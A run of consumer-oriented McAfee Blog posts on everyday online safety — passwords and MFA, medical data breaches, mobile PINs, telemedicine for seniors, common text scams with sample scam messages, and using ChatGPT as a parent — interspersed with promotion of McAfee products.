Strong, unique passwords offer another primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task. Thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software like ours will include a password manager.
Updates do all kinds of great things for gaming, streaming, and chatting apps—like adding more features and functionality over time. Updates do something else. They make those apps more secure. Hackers will hammer away at apps to find or create vulnerabilities, which can steal personal info or compromise the device itself. Updates will often include security improvements, in addition to performance improvements.
For your computers and laptops:
For your smartphones:
For your smartphone apps:
Whether they come by way of an email, text, direct message, or as bogus ads on social media and in search, phishing attacks remain popular with cybercriminals. Across their various forms, the intent remains the same—to steal personal or account info by posing as a well-known company, organization, or even someone the victim knows. And depending on the info that gets stolen, it can result in a drained bank account, a hijacked social media profile, or any number of different identity crimes.
What makes some phishing attacks so effective is how some hackers can make the phishing emails and sites they use look like the real thing, so learning how to spot phishing attacks has become a valuable skill nowadays. Additionally, using the power of AI, McAfee Scam Protection can alert you when scam texts pop up on your device or phone. No more guessing if a text is real or not. Further, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more.
Some signs of a phishing attack include:
Again, this can take a sharp eye to spot. When you get emails like these, take a moment to scrutinize them and certainly don’t click on any links.
Another way you can fight back against crooks who phish is to report them. Check out ReportFraud.ftc.gov, which shares reports of phishing and other fraud with law enforcement. Taken with other reports, your info can aid an investigation and help bring charges on a cybercriminal or an organized ring.
Chances are you’re using multi-factor authentication (MFA) on a few of your accounts already, like with your bank or financial institutions. MFA provides an additional layer of protection that makes it much more difficult for a hacker or bad actor to compromise your accounts even if they know your password and username. It’s common nowadays, where an online account will ask you to use an email or a text to your smartphone to as part of your logon process. If you have MFA as an option when logging into your accounts, strongly consider using it.
How did that scammer get your email address or phone number in the first place? Good chance they bought it off a data broker.
Data brokerages make up a multi-billion-dollar business worldwide. They gather and sort data linked with millions of people globally—and then sell it. To anyone. That could be advertisers, private investigators, and potential employers. That list includes hackers and scammers as well. With your data, they can skim for your contact info so they can hit you with spammy emails, calls, and texts. Worse yet, they can use that info to help them commit identity theft.
Good thing you can get your info removed from those sites. And a service like our Personal Data Cleanup can do the heavy lifting for you. It scans some of the riskiest data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites. With select products, we can even manage the removal for you.
How much time do you spend on the internet each day? Between work, home, and the phone you carry around, it’s around 6.5 hours a day on average. You spend plenty of time on the internet. And important time too as you shop, bank, and tend to your health online.
Taking a few moments this month to shore up your security will make that time safer. Despite what you might have thought, you’re more in control of that than you think.
The post How much do you count on the internet every day? appeared first on McAfee Blog.
You’ve been fortunate over the years — no lost phone, no credit card fraud, no computer viruses. Still, deep down, you fear your sloppy digital habits will eventually catch up with you. So, instead of dread and denial, how about a little peace of mind? The perfect time to take a few easy steps and make your digital life your most unhackable is now. Here are seven easy ways to tighten up your digital habits:
This small action sounds like a big deal, but it’s easy and important. Two-factor authentication simply puts two layers of security on any personal information channels you frequent. Be it your phone, Facebook, email, or bank account, taking the extra time to implement a two-step password entry, will mean potential crooks will get frustrated and move on to someone else’s information.
McAfee Pro Tip: Go into the account settings of any important account and manually opt for a two-factor authentication account entry. Once set up, the next time you log in to your account, you’ll be prompted to provide the secondary authentication, such as entering a code from your authentication app or confirming a text message code
It’s convenient and fun to work from the local coffee shop. However, it only takes one nosey, unethical person at that location to access your computer through that shared public network. Snoopers can easily access your passwords, emails, and anything else on your computer. Do your sensitive work at home or in the office on a secure, password-protected network and save your non-wifi workload, such as report reading or writing (sans wifi) for the coffee shop. Avoid doing any banking or private work on public wifi, especially.
McAfee Pro Tip: Check the URL in your browser’s address bar. If it starts with “https” (rather than just “http”), it’s secure and encrypted, ensuring your data is protected during transmission. If it’s only “http,” the site isn’t secure, so avoid proceeding. If using public Wi-Fi, activate your firewall in your security settings to block incoming traffic and enhance protection against potential threats.
According to McAfee’s Digital Asset Study, the most common mistake consumers make is using the same password for all or most online accounts. If this is you, break this poor habit once and for all.
Take this step: Take an hour of your day and change and document your passwords. Once you’ve beefed up your passwords, you can simplify the password process by using True Key multi-factor authentication service for free. A strong password has all of the following characteristics:
→ Dig Deeper: 5 Tips For Creating Bulletproof Passwords
Simplify, simplify, simplify your gadget use, and your safety will improve immediately. With so many digital assets flying at us daily — email, images, files, documents, attachments — it’s easy to get overwhelmed. And, when we are overwhelmed, it’s easy to get sloppy in the places that matter most — like privacy. Focus on your safety and declutter your devices when needed.
To organize:
While you sleep, work, or play, hackers tirelessly attempt to infiltrate your computer with malicious software, spyware, and viruses. The lack of anti-virus software on your device is an open invitation to these cyber criminals. Therefore, consider investing in robust antivirus software this year. In addition to this, consider installing filtering software to enhance your social media safety, making it a safer platform for your entire family.
Want to take your privacy a notch higher? Consider cutting back on your social sharing. Hackers often create fake social media accounts and use them to monitor your personal data. A determined identity thief on Facebook can gather enough information about you to bypass the security questions on your accounts, potentially gaining access to your financial data. It’s time to rethink your approach to social media. Consider pruning your social circle on platforms like Facebook, Twitter, Instagram, and Snapchat to include only those you know and trust. The lure of high follower numbers is not worth the risk of a potential security breach. Remind your family never to post personal details like your full name, Social Security number, address, phone number, and account numbers on public websites.
To minimize potential damage from oversharing, exercise caution when accepting friend requests or follows from people you don’t know. Also, remember to check your privacy settings. Many platforms allow you to control who sees your posts, profile information, and tagged photos. These features will give you greater control over your online presence.
→ Dig Deeper: Protecting Your Privacy on Social Media
Updating software can seem like a chore, especially during a busy workday. However, it’s vital to ensure your digital life remains secure. Cybercriminals always look for outdated software and browsers, preying on the security gaps they exploit. If you frequently use software such as Adobe Flash, Adobe Shockwave, Adobe Acrobat Reader, Java, or browsers like Chrome and Internet Explorer, ensure you’re always running the latest version. By consciously keeping your software updated, you’re erecting yet another line of defense against potential cyber threats.
Furthermore, remember to back up your files regularly. In case of a cyber-attack, a recent backup can save you a lot of trouble and ensure you don’t lose any crucial data.
→ Dig Deeper: Why Software Updates Are So Important
As cybercrimes become increasingly rampant, consider it an ideal opportunity to tighten your digital habits. Investing a little time and effort into securing your digital life can ensure a safer, more protected online experience. Following these simple steps; implementing two-factor authentication, avoiding public wifi, strengthening passwords, decluttering devices, targeting software, reconsidering sharing habits, and staying updated can profoundly impact your digital security. Here’s to a secure and serene digital life with McAfee!
The post 7 Ways to Clean Up Those Sloppy Digital Habits appeared first on McAfee Blog.
As healthcare integrates increasingly digital processes into its operations, the need for robust security measures increases. For many of us, visiting our healthcare provider involves filling out forms that are then transferred into an Electronic Health Record (EHR) system. We put our trust in these healthcare institutions, expecting them to take the necessary steps to store our sensitive data securely. However, with a significant rise in medical data breaches, a whopping 70% increase over the past seven years, it has become more important to understand how these breaches occur and how we can protect ourselves.
Recently, LabCorp, a medical testing company, announced a breach affecting approximately 7.7 million customers, exposing their names, addresses, birth dates, balance, and credit card or bank account information. This breach occurred due to an issue with a third-party billing collections vendor, the American Medical Collection Agency (AMCA). Not long before this, Quest Diagnostics, another company collaborating with AMCA, experienced a similar breach, affecting 11.9 million users.
Medical data is, by nature, nonperishable, making it a highly valuable asset for cybercriminals. This means that while a credit card number or bank account detail can be changed if compromised, medical information remains constant, maintaining its value over time. This also suggests that once procured, this information can be used for various malicious activities, from identity theft to extortion.
Realizing that the healthcare industry is riddled with various security vulnerabilities is crucial. Unencrypted traffic between servers, the ability to create admin accounts remotely, and the disclosure of private information are all shortcomings that these cybercriminals can exploit. With such access, they can permanently alter medical images, use medical research data for extortion, and much more. According to the McAfee Labs Threats Report, the healthcare sector witnessed a 210% increase in publicly disclosed security incidents from 2016 to 2017, resulting from failure to comply with security best practices or address vulnerabilities in medical software.
→ Dig Deeper: How to Safeguard Your Family Against A Medical Data Breach
While the onus lies on healthcare institutions to ensure the security of patients’ data, there are several steps that individuals can take on their own to safeguard their privacy. These steps become particularly pivotal if you think your personal or financial information might have been compromised due to recent breaches. In such instances, following certain best practices can significantly enhance your personal data security.
One such measure is placing a fraud alert on your credit. This effectively means that any new or recent requests will be scrutinized, making it challenging for fraudulent activities to occur. Additionally, the fraud alert enables you to access extra copies of your credit report, which you can peruse for any suspicious activities.
Another effective step you can consider is freezing your credit. Doing so makes it impossible for criminals to take out loans or open new accounts in your name. However, to execute this effectively, remember that credit needs to be frozen at each of the three major credit-reporting agencies – Equifax, TransUnion, and Experian.
Moreover, vigilance plays a critical role in protecting your personal data. Regularly checking your bank account and credit activity can help you spot any anomalies swiftly, allowing you to take immediate action.
McAfee Pro Tip: To lock or to freeze? That is the question. Credit lock only offers limitations in accessing an account. A credit freeze generally has more security features and financial protections guaranteed by law and the three major credit bureaus, so you’ll have more rights and protection if identity theft, fraud, scams, and other cybercrimes occur with a credit freeze compared to a credit lock. Learn more about the difference between credit freeze and credit lock here.
Identity theft protection services offer an additional layer of security to protect your personal as well as financial information. They actively monitor your accounts, provide prompt alerts for any suspicious activities, and help you recover losses if things go awry. An identity theft protection service like McAfee Identity Theft Protection can be beneficial. Remember, however, that even with such a service, you should continue practicing other security measures, as they form part of a comprehensive approach to data security.
These services work in the background to ensure constant protection. However, choosing a reputable and reliable identity theft protection service is essential. Do thorough research before committing and compare features such as monitoring services, recovery assistance, and insurance offerings. This step can help protect you not only during medical data breaches but also on other digital platforms where your personal information is stored.
If you suspect your personal data has been compromised, you should check your bank account and credit activity frequently. Regular monitoring of your accounts empowers you to stop fraudulent activity. Many banks and credit card companies provide free alerts—through an email or text message—whenever a new purchase is made, an unusual charge is noticed, or your account balance drops to a particular level.
Besides, you should also consider utilizing apps or online services provided by banks and credit companies to keep an eye on your accounts. Such tools can help you track your financial activity conveniently and take instant action if any suspicious activity is spotted. Regularly updating your contact information with banks and credit companies is also important, as it ensures you receive all alerts and updates on time.
→ Dig Deeper: Online Banking—Simple Steps to Protect Yourself from Bank Fraud
Increased digitization in the healthcare sector has brought convenience and improved patient services. However, it also presents attractive targets for cybercriminals eager to exploit vulnerabilities for personal gain. Medical data breaches are concerning due to their potential long-term impacts, so it’s critical to protect your personal information proactively.
While healthcare institutions must shoulder the primary responsibility to safeguard patient information, users are far from helpless. By placing a fraud alert, freezing your credit, using identity theft protection services like McAfee Identity Theft Protection, and maintaining vigilance over your financial activity, you can form a comprehensive defense strategy to protect yourself against potential breaches.
The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blog.
Beyonce sang “if you like it you better put a ring on it” but the same can be said for our personal information on our mobiles. But rather than a ring, the lyric would be “If you like it, you better put a PIN on it.” A PIN, or Personal Identification Number, is your first defense against thieves or hackers who might want to access your private data from your smartphone or tablet.
As we increasingly depend on our digital devices to store and transfer personal data and use the internet for transactions, we are also becoming increasingly vulnerable to digital attacks on our privacy. Having a PIN on your devices is a simple but effective way to add an extra layer of security. Yet, it is reported that half of iPhone users, for instance, don’t use a lock on their devices. In another study, a nationwide survey by Consumer Reports in 2014 found that 30% of people don’t have a PIN or passcode on their smartphones or tablets. This is concerning because by not securing their devices, they are exposing themselves to potential threats of financial fraud, identity theft, and privacy loss.
Your device and its private data are invaluable resources for any potential hacker or data thief. Yet, we often do not protect our smartphones or tablets, the sensitive information they contain, or our wallets or home computers. Every day should be Data Privacy Day, a time to stress the importance of taking privacy seriously and review your privacy settings and practices.
→ Dig Deeper: What is Data Privacy and How Can I Safeguard It?
By not protecting your mobile devices, you are potentially opening yourself up to financial fraud, identity theft, and overall invasion of your privacy. The data available on your phone, from personal photos and conversations to banking information and private documents, can be a goldmine for any potential attacker. This is why companies like McAfee are announcing new pushes for personal security, such as the “Crack the Pin” initiative. This encourages people to take simple steps toward preserving their privacy by locking, tracking, and encrypting their devices.
From fortifying your online accounts with robust passwords to understanding the intricacies of encryption, and from practicing discretion in sharing personal information to recognizing the red flags of phishing attempts, let’s explore a comprehensive set of strategies and practices to help you navigate the digital world with confidence and protect what matters most—your privacy.
One way to ensure the privacy of your mobile devices is through the use of mobile security products. McAfee, for example, has products such as McAfee Mobile Security and McAfee LiveSafe that are designed specifically to protect your devices and the personal data stored on them. These products provide a wide range of security features, from data encryption to anti-theft measures and privacy protection. They can scan apps for potential threats, prevent phishing attacks, and allow you to locate, lock, and wipe your devices in case they get lost or stolen.
→ Dig Deeper: Does My Phone Have a Virus?
Beyond using security products, staying educated on the latest data privacy trends and security measures is also important. This includes keeping your operating system and apps updated, as software updates often contain vital security improvements. Regularly backing up your data is also crucial so that your personal data is not completely lost in the event of a device loss or failure.
Another important aspect of securing your mobile devices is encryption. Encryption is a process that converts your data into an unreadable format that cannot be understood without the correct decryption key. Essentially, even if a hacker or thief manages to access your device, they cannot read your data if it is encrypted. Many smartphones and tablets have encryption options built into the settings, but it’s up to the user to ensure they turn it on and use it correctly.
When it comes to encryption, it’s also crucial to understand the difference between device encryption and app encryption. Device encryption ensures that all data stored on your device is secure, while app encryption secures data within specific apps. While both are important, device encryption is generally considered more comprehensive. However, you should still check the privacy settings in individual apps to ensure your data is protected.
McAfee Pro Tip: When engaging in activities like online banking, shopping, or signing up on a website that requests your personal details, be sure to check for a website address that commences with “https:” rather than just “http:”. This signifies that the site employs encryption for added security. Learn more about encryption here.
In conclusion, securing your mobile devices and their precious personal data should be a top priority. The first step is to put a PIN on your devices and ensure it’s not easily guessable. Other important steps include refraining from sharing your PIN, using security products, staying updated on the latest privacy trends, and employing encryption for comprehensive security. Remember, data privacy is not a one-time event, but a continuous process that requires regular attention and action. So let’s take a page from Beyonce’s book and “put a PIN on it” to keep our private data safe and secure.
The post Put a PIN on It: Securing Your Mobile Devices appeared first on McAfee Blog.
For weeks and even months now, millions of us have relied on the internet in ways we haven’t before. We’ve worked remotely on it, our children have schooled from home on it, and we’ve pushed the limits of our household bandwidth as families have streamed, gamed, and conferenced all at the same time. Something else is new—more and more of us have visited our doctors and healthcare professionals online. Needless to say, this is an entirely new experience for many. And with that, I got to thinking about seniors. What’s been their experience with telemedicine? What concerns have they had? And how can we help?
For starters, an online doctor’s visit is known as telemedicine—a way of diagnosing and treating a medical issue remotely. With telemedicine, care comes from your smartphone or computer via a video conference or a healthcare provider’s portal.
Telemedicine is not new at all. It’s been in use for some time now, such as in rural communities that have little access to local healthcare professionals, in cases of ongoing treatment like heart health monitoring and diabetes care, and in situations where a visit to the doctor’s office simply isn’t practical. What is new is this: telemedicine has made a significant leap in recent months.
A recent global consumer survey by Dynata took a closer look at this trend. The research spanned age groups and nations across North America and Europe, which found that 39% of its respondents consulted a physician or healthcare professional online in the past few months. Of them, two-thirds said they used telemedicine as part of their care. Yet more telling, 84% of those who recently had a telemedicine appointment said this was the first time they used telemedicine.
Dynata’s study also looked at their attitudes and experiences with telemedicine based on age and reported that members of the Baby Boomer generation found the experience satisfactory—just over 55%. Interestingly, this was also quite consistent across other age groups, with all hovering just above or below that same level of satisfaction.
Another study gives us insight into how seniors’ opinions about telemedicine may have changed in the past year. We can contrast the findings above with a University of Michigan study that polled American adults aged 50 to 80 in the middle of 2019. On the topic of telemedicine, the research found that:
The University of Michigan study also asked how older Americans felt about telemedicine visits. At that time in 2019, only 14% said that their provider offered telemedicine visits, while 55% didn’t know if they had the option available to them at all. Just a small number, 4%, said they’d had a telemedicine visit within the year. Needless to say, it’ll be interesting to see what 2020’s results would have to say should the university run this poll again.
In terms of their experience with telemedicine, of those who had at least one telemedicine visit, 58% felt that in-person office visits provided an overall better level of care, and about 55% felt that in-person visits were better for communicating with their healthcare professional and feeling better cared-for overall.
→ Dig Deeper: 6 Tips for a Safer and Easier Telemedicine Visit
While it may seem daunting for seniors to navigate the world of telemedicine, there are several advantages to this healthcare approach. One of the main benefits of telemedicine is the elimination of travel time. This can be particularly beneficial for seniors with mobility issues or living in rural areas lacking transportation. As all consultations are conducted virtually, seniors can access healthcare from the comfort of their homes.
Another benefit is the ease of monitoring chronic conditions. Telemedicine allows healthcare providers to closely monitor patients’ symptoms and adjust treatment plans without requiring frequent office visits. This not only saves time but can also lead to better health outcomes. With health trackers and mobile applications, healthcare providers can remotely monitor vitals like blood sugar levels or heart rate, enabling immediate intervention if required.
→ Dig Deeper: How to Make Telehealth Safer for a More Convenient Life Online
The main barrier to telemedicine for seniors is often technology. A lack of familiarity with the required devices and applications can prove daunting for some. However, with a little help and guidance, this can be overcome. Caregivers, family members, or telemedicine providers can teach seniors how to use the necessary technology. Various user-friendly applications are designed with seniors in mind, simplifying the process.
Providers also often have customer support available to assist with any technological difficulties. It’s essential to remember that the benefits of telemedicine can considerably outweigh the initial learning curve of navigating these new tools. Practice and patience can go a long way in making telemedicine a comfortable and convenient option for seniors.
McAfee Pro Tip: One essential item seniors should have during their visit is a dependable device they are familiar with. This could include a desktop computer, laptop, smartphone, or tablet. Remember that certain telemedicine solutions used by healthcare providers might have specific requirements, so it’s important to check those and ensure their devices are compatible.
Telemedicine can benefit seniors, offering more accessible healthcare services and better chronic condition management. While technological may seem challenging, it can be successfully navigated with the right guidance and support. Ultimately, telemedicine is a tool to improve healthcare accessibility and outcomes for seniors, and taking the first steps towards embracing it can lead to better health and comfort.
Improve your telemedicine use with McAfee+, which comes with identity monitoring, unlimited VPN, antivirus, scam protection, data cleanup, and more.
The post Medical Care From Home: Telemedicine and Seniors appeared first on McAfee Blog.
One of the essential aspects of digital security resides in the strength of our passwords. While they are the most convenient and effective way to restrict access to our personal and financial information, the illusion of a fully secure password does not exist. The reality is that we speak in terms of less or more secure passwords. From a practical perspective, we must understand the behind-the-scenes actions that could potentially compromise our passwords and consequently, our digital lives.
Unfortunately, most users frequently overlook this crucial part of their digital existence. They remain largely ignorant of numerous common techniques that hackers employ to crack passwords, leading to the potential loss of personal details, financial information, or even identity theft. Therefore, this blog aims to enlighten readers on how they might be unknowingly making their passwords vulnerable.
Passwords serve as the first line of defense against unauthorized access to our online accounts, be it email, social media, banking, or other sensitive platforms. However, the unfortunate reality is that not all passwords are created equal, and many individuals and organizations fall victim to password breaches due to weak or compromised credentials. Let’s explore the common techniques for cracking passwords, and learn how to stay one step ahead in the ongoing battle for online security.
In the world of cyber-attacks, dictionary attacks are common. This approach relies on using software that plugs common words into the password fields in an attempt to break in. It’s an unfortunate fact that free online tools exist to make this task almost effortless for cybercriminals. This method spells doom for passwords that are based on dictionary words, common misspellings, slang terms, or even words spelled backward. Likewise, using consecutive keyboard combinations such as qwerty or asdfg is equally risky. An excellent practice to deflect this attack is to use unique character combinations that make dictionary attacks futile.
Besides text-based passwords, these attacks also target numeric passcodes. When over 32 million passwords were exposed in a breach, nearly 1% of the victims used ‘123456’ as their password. Close on its heels, ‘12345’ was the next most popular choice, followed by similar simple combinations. The best prevention against such attacks is avoiding predictable and simple passwords.
→ Dig Deeper: Cracking Passwords is as Easy as “123”
While security questions help in password recovery, they also present a potential vulnerability. When you forget your password and click on the ‘Forgot Password’ link, the website generally poses a series of questions to verify your identity. The issue here is that many people use easily traceable personal information such as names of partners, children, other family members, or pets as their answers, some of which can be found on social media profiles with little effort. To sidestep this vulnerability, it’s best not to use easily accessible personal information as the answer to security questions.
McAfee Pro Tip: Exercise caution when sharing content on social media platforms. Avoid making all your personal information publicly accessible to thwart hackers from gathering sensitive details about you. Learn more about the dangers of oversharing on social media here.
A common mistake that many internet users make is reusing the same password for multiple accounts. This practice is dangerous as if one data breach compromises your password, the hackers can potentially gain access to other websites using the same login credentials. According to a report published by LastPass in 2022, a recent breach revealed a shocking password reuse rate of 31% among its victims. Hence, using unique passwords for each of your accounts significantly reduces the risk associated with password reuse.
Moreover, it’s also advisable to keep changing your passwords regularly. While this might seem like a hassle, it is a small price to pay for ensuring your digital security. Using a password manager can help you remember and manage different passwords for different websites.
Social Engineering is a non-technical strategy that cybercriminals use, which relies heavily on human interaction and psychological manipulation to trick people into breaking standard security procedures. They lure their unsuspecting victims into revealing confidential data, especially passwords. Therefore, vigilance and skepticism are invaluable weapons to have in your arsenal to ward off such attacks.
The first step here would be not to divulge your password to anyone, no matter how trustworthy they seem. You should also be wary of unsolicited calls or emails asking for your sensitive information. Remember, legitimate companies will never ask for your password through an email or a phone call.
Despite the vulnerabilities attached to passwords, much can be done to enhance their security. For starters, creating a strong password is the first line of defense. To achieve this, you need to use a combination of uppercase and lowercase letters, numbers, and symbols. Making the password long, at least 12 to 15 characters, significantly improves its strength. It’s also advisable to avoid using common phrases or strings of common words as passwords- they can be cracked through advanced versions of dictionary attacks.
In addition to creating a strong password, adopting multi-factor authentication can greatly enhance your account security. This technology requires more than one form of evidence to verify your identity. It combines something you know (your password), something you have (like a device), and something you are (like your fingerprint). This makes it more difficult for an attacker to gain access even if they have your password.
→ Dig Deeper: 15 Tips To Better Password Security
The future of passwords looks promising. Scientists and tech giants are working relentlessly to develop stronger and more efficient access control tools. Biometrics, dynamic-based biometrics, image-based access, and hardware security tokens are some of the emerging technologies promising to future-proof digital security. With biometrics, users will no longer need to remember complex passwords as access will be based on unique personal features such as fingerprints or facial recognition.
Another promising direction is the use of hardware security tokens, which contain digital certificates to authenticate the user. These tokens can be used in combination with a password to provide two-factor authentication. This makes it more difficult for an attacker to gain access as they would need both your token and your password. While these technologies are still developing, they suggest a future where access control is more secure and user-friendly.
In conclusion, while there’s no such thing as a perfectly secure password, much can be done to enhance their security. Understanding the common techniques for cracking passwords, such as dictionary attacks and security questions’ exploitation, is the first step towards creating more secure passwords. Using unique complex passwords, combined with multi-factor authentication and software tools like McAfee’s True Key, can greatly improve the security of your accounts.
The future of passwords looks promising with the development of biometrics and hardware security tokens. Until then, it’s crucial to adopt the best password practices available to protect your digital life. Remember, your online security is highly dependent on the strength and uniqueness of your passwords, so keep them complex, unique, and secure.
The post What Makes My Passwords Vulnerable? appeared first on McAfee Blog.
Getting a text message is a lot like someone calling out your name. It’s tough to ignore.
Delivery notifications, messages from your bank, job offers, and security alerts—those texts have a way of getting your attention. And scammers know it. In the U.S. alone, their text-based scams accounted for a reported $330 million in losses in 2022—nearly a 5x increase compared to 2019.
When it comes time for scammers to reach their victims, text messages are the top choice. Far more so than email or phone calls. Estimates show that up to 98% of people will read a text message. Half of them will answer it. Compare that to email, which has an open rate that hovers around 20% and a reply rate of 6%.
In all, text scams make for cheap, easy, and effective attacks. Even more so with the help of highly convincing messages scripted by AI.
Scammers simply have it easier and easier these days. Or so it can seem. Now you have an AI-powered tool that can finally put an end to those scam texts on your phone— McAfee Scam Protection.
Let’s check out the top scams out there today, and then how McAfee Scam Protection and a few other steps can make your time on your phone a lot less annoying and a lot safer as well.
According to the Federal Trade Commission (FTC), five specific text scams account for 42% of scams randomly sampled by the commission. Here’s how they stack up:
Sound familiar, like something that you’ve seen pop up on your phone? Chances are it does. In all, the scammers behind these texts want the same thing—your personal info, money, or a combination of both. They just take different routes to get there.
Beyond the top five, the other 58% of scams put their spin on their texts. However, different as they are, these scam texts have several common signs you can spot.
First off, they usually include a link. The link might include unusual strings of characters and a web address that doesn’t match who the message says it’s coming from. Like a bogus notice from the post office that doesn’t use the official post office URL. Or, the link might look almost like a legitimate address, but changes the name in a way that indicates it’s bogus.
Instead of a link, the text might contain a phone number to call. Sophisticated scam operations run call centers that work much like legitimate call centers—although scammers design them to steal your money and personal info.
The message might employ a scare tactic or threat. Scammers love this approach because it successfully plays on people’s emotions and gets them to act quickly without much thinking.
Sometimes, the text might be a seemingly innocent message. Like, “Is this Steven’s number?” Or, “I’ll always love you.” Sometimes it’s only a simple, “Hi.” This is by design. The scammer wants to pique your curiosity, or your desire to be helpful, and then respond. From there, the scammer will try to strike up a conversation, which can lead to a romance scam or a similar con game like an online job scam.
Fortunately, scammers tend to follow a basic script. You’ll see variations, of course. Yet these texts share common elements, just as text scams in general do. That makes them easy to spot.
Be on the lookout for:
Bank scams like, “BANK FRAUD ALERT: Did you make a $4,237.95 purchase at Jacuzzi World? Please confirm!” You’ll know if it’s a scam if the text:
Gift scams like, “ATT FREE MESSAGE. Thanks for paying your bill. Click here for a reward.” First, you can note that the scammer spelled the phone carrier AT&T incorrectly. Other signs of a scam include:
Delivery scams like, “We were unable to deliver your shipment. Please update your info so that we can get your package to you.” This is a common one, and you can spot it several ways:
Job scams like, “BE A SECRET SHOPPER. Make $500 per store! Click the link to get started!” A company that hires employees by sending thousands of spammy texts isn’t a company at all. It’s a scam. Other signs are:
Amazon scams like, “TRANSACTION ALERT: Your purchase of a 65” QLED TV for $1,599.99 is confirmed. Not you? Contact us to cancel the order.” This is a spin on the bank fraud alert, with the scammers posing as Amazon’s fraud team. Aside from using the Amazon name, other signs include:
With what you need to spot scam texts, now you can avoid the damage they can do. And you can take additional steps to keep them from reaching you altogether.
1. Don’t tap on links in text messages: If you follow one piece of advice, it’s this.
2. Follow up directly: If you have concerns, get in touch with the company you think might have sent it. Manually type in their website and enquire there. Again, don’t tap any links.
3. Clean up your personal data: Scammers must have gotten your number from somewhere, right? Often, that’s an online data broker—a company that keeps thousands of personal records for millions of people. And they’ll sell those records to anyone. Including scammers. A product like our Personal Data Cleanup can help you remove your info from some of the riskiest sites out there.
4. Get scam protection: Using the power of AI, our new McAfee Scam Protection can alert you when scam texts pop up on your phone. And as a second line of defense, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more.
Also, consider playing a part in the solution.
Businesses, agencies, and law enforcement work together to shut down scams. Many of them have websites and points of contact for reporting fraud. Netflix offers a good example, and so does the Internal Revenue Service (IRS) in the U.S. McAfee has a page dedicated to fraud as well.
Further, in the U.S., you can also report it to the FTC at https://www.ReportFraud.ftc.gov. Similarly, they use and share reports with law enforcement partners to help with investigations.
If you spot a clear imposter or scam, give some thought to grabbing a screenshot and reporting it.
Even as scammers’ attacks get more sophisticated, the tools that can beat them are more sophisticated as well. In part thanks to AI. With a sharp eye, tools like McAfee’s Scam Protection can help you steer clear of text scams.
With both in place, you can improve the chances that your next incoming text is from a friend that brings a smile to your face—instead of a scam text that leaves you shaking your head.
The post Hold onto Your Phone, and Your Wallet – The Top Five Text Scams appeared first on McAfee Blog.
I have a confession to make – I so wish ChatGPT was around when my kids were younger. I realise that it’s not perfect but in my opinion, it’s like having a personal digital assistant to help you wade through those super heavy parenting years. Imagine how helpful it would be to have your ‘assistant’ develop a personalised bedtime story for your 6-year-old or, work out what you can cook with just the ingredients in your fridge!! I am so sure I would have been a more relaxed mother if I had ChatGPT working for me!!
How Does ChatGPT Work?
ChatGPT is an amazing website that allows you to have human-like conversations with a chatbot that is driven by Artificial Intelligence (AI) technology. The chatbot can answer your questions, compose emails and essays, translate text, develop code and more. At the time of writing, there is a free version of ChatGPT available which gives the user unlimited access however the paid premium version of $US20 per month gives priority access during peak times, faster response speeds and exclusive access to GPT-4 – a smarter and more capable chatbot!
If you’d like to know more about it, check out my Parents’ ChatGPT Guide which will help fill in the blanks.
How ChatGPT Can Make You A Better Parent
There are so many ways ChatGPT can reduce the stress of parenting and give you some much-needed head space. Here are my top 5:
1. What’s For Dinner?
If I look back at the super intense parenting years when I was working full-time with 4 kids, one of the greatest causes of my stress was dinner. I often wouldn’t have the physical energy to read a recipe book or stop at the shops after an afternoon of school and extra-curricular pickups so I would be scrambling to feed a bunch of ravenous boys. Imagine how good it would be to have your digital assistant, aka ChatGPT, devise a recipe based on what you have in your fridge and pantry? Nothing short of life-changing, in my opinion. And it can even factor in dietary restrictions! So clever!!
2. Can You Tell Me A Bedtime Story
My boys loved bedtime stories – preferably personalised! I know, very demanding!! Now, with 4 separate stories to deliver every night, you can only imagine how much mental energy this required. But if I had ChatGPT working for me, this would take just seconds to solve. Simply enter the name and age of the child (no surnames), the setting, the names of other characters that should be included, and then a theme e.g. hero’s journey, determination, friendship, and wham bam – you’ve got something ready to go!
3. Your Next Holiday – Sorted!
When things are so hectic, it is often the thought of a vacation that can keep you going. However, let’s be honest, successful holidays take quite a bit of planning to get right. Well – that’s where your digital assistant can help. If you ask, ChatGPT can develop itineraries with activity suggestions. It can also recommend hotels – simply ask it for suggestions within a specific location e.g. close to the Eiffel Tower. And it can also tailor its recommendations based on your budget. After planning and managing family holidays for my clan of 6 for well over 20 years, this is a life-changing feature!
4. The Best Birthday Party Checklist Ever
Far out, birthday parties can be stressful experiences. Invitations, themes, venue, entertainment, kids’ food, lolly bags, parents’ food, parents’ drinks, the list goes on and on. But if you haven’t already put ChatGPT to work as a party planner – then you’re missing out. Simply type in the age of the child and it can give you an entire plan. It will also give you 20-25 top tips that I guarantee will ensure you have everything covered!
5. Homework Help
If you’ve got a tribe of kids who are all at various levels and need homework help, then staying up to date with maths and science can be quite exhausting – particularly after a long day at work! Simply entering ‘explain’ or ‘explain so a 10-year-old can understand’ into ChatGPT will provide you with enough smarts to get that homework done. Of course, fact-checking ChatGPT is essential but what it will provide is some momentum in the right direction.
But A Word of Caution
ChatGPT can absolutely make your life easier as a parent but there are a few things to remember before you start typing into that chat box.
1. It Doesn’t Always Get Everything Right
It’s important to double-check everything. Ensure your kids also appreciate that everything online needs to be double-checked.
2. Be Mindful of Your Privacy When Using It
For a full explanation of its impact on privacy and how you can protect yourself, check out my recent blog post about . But to summarise: be careful what you share in the chat box, stay anonymous, and consider deleting your chat history.
3. Consider How You Use It With Your Kids
One of the biggest negatives of ChatGPT is its potential impact on creativity and thinking skills. Some schools and universities have banned its use while others have specialised programs that supposedly can detect whether a student has used it. While it does sadden me that our kids won’t need to struggle over complex maths questions or English essays like we did, I am a realist and believe that whether we like it or not – it is here to stay. My prediction is that the school and university systems will adapt because generative AI will be a part of our kids’ world. Our role as parents and educators is to teach them how to use it safely and with a critical-thinking mindset.
So, if you’ve dreamed about hiring a personal assistant (I do regularly!) then you so need to check out ChatGPT. It will help you get through your ‘to-do’ list, save you so much time and energy which means you’ve got more time to spend with your kids – or by yourself under a tree. You choose!!
Till Next Time
Stay Safe Online
Alex
The post Could ChatGPT Be The Best Thing That’s Ever Happened To Your Family? appeared first on McAfee Blog.
